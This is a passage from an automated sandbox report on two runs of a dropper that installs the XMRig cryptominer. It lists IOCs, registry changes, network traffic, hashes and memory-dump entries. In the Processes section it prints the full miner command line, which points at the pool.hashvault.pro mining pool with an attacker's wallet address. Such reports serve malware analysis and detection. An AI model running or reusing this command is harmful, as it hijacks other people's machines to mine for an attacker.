memory/2280-51-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-52-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-53-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-54-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-55-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-56-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-57-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-58-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-59-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-60-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-61-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-62-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-63-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-64-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-65-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-66-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-67-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-68-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-69-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-70-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-71-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-72-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-73-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-74-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-75-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-76-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-77-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-78-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-79-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-80-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-81-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-82-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-83-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-84-0x00007FF752200000-0x00007FF752D03000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:04
Platform
win10v2004-20240508-en
Max time kernel
1772s
Max time network
1778s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 376 wrote to memory of 3324 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 376 wrote to memory of 3324 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3324-16-0x0000016C4EEA0000-0x0000016C4EEC0000-memory.dmp
memory/3324-17-0x0000016C4EEF0000-0x0000016C4EF10000-memory.dmp
memory/3324-18-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-21-0x0000016C4EF30000-0x0000016C4EF50000-memory.dmp
memory/3324-19-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-20-0x0000016C4EF10000-0x0000016C4EF30000-memory.dmp
memory/3324-22-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-23-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-25-0x0000016C4EF30000-0x0000016C4EF50000-memory.dmp
memory/3324-24-0x0000016C4EF10000-0x0000016C4EF30000-memory.dmp
memory/3324-26-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-27-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-28-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-29-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-30-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-31-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-32-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-33-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-34-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-35-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-36-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-37-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-38-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-39-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-40-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-41-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-42-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-43-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-44-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-45-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-46-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-47-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-48-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-49-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-50-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-51-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-52-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-53-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-54-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-55-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-56-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-57-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-58-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-59-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-60-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-61-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-62-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-63-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-64-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-65-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-66-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-67-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-68-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-69-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-70-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-71-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-72-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-73-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-74-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-75-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-76-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-77-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-78-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-79-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-80-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-81-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-82-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-83-0x00007FF635E60000-0x00007FF636963000-memory.dmp
memory/3324-84-0x00007FF635E60000-0x00007FF636963000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:01
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5024 wrote to memory of 5028 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5024 wrote to memory of 5028 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5028-16-0x0000010776E90000-0x0000010776EB0000-memory.dmp
memory/5028-17-0x0000010778690000-0x00000107786B0000-memory.dmp
memory/5028-18-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-21-0x00000107786D0000-0x00000107786F0000-memory.dmp
memory/5028-20-0x00000107786B0000-0x00000107786D0000-memory.dmp
memory/5028-19-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-22-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-23-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-25-0x00000107786D0000-0x00000107786F0000-memory.dmp
memory/5028-24-0x00000107786B0000-0x00000107786D0000-memory.dmp
memory/5028-26-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-27-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-28-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-29-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-30-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-31-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-32-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-33-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-34-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-35-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-36-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-37-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-38-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-39-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-40-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-41-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-42-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-43-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-44-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-45-0x00007FF765E80000-0x00007FF766983000-memory.dmp
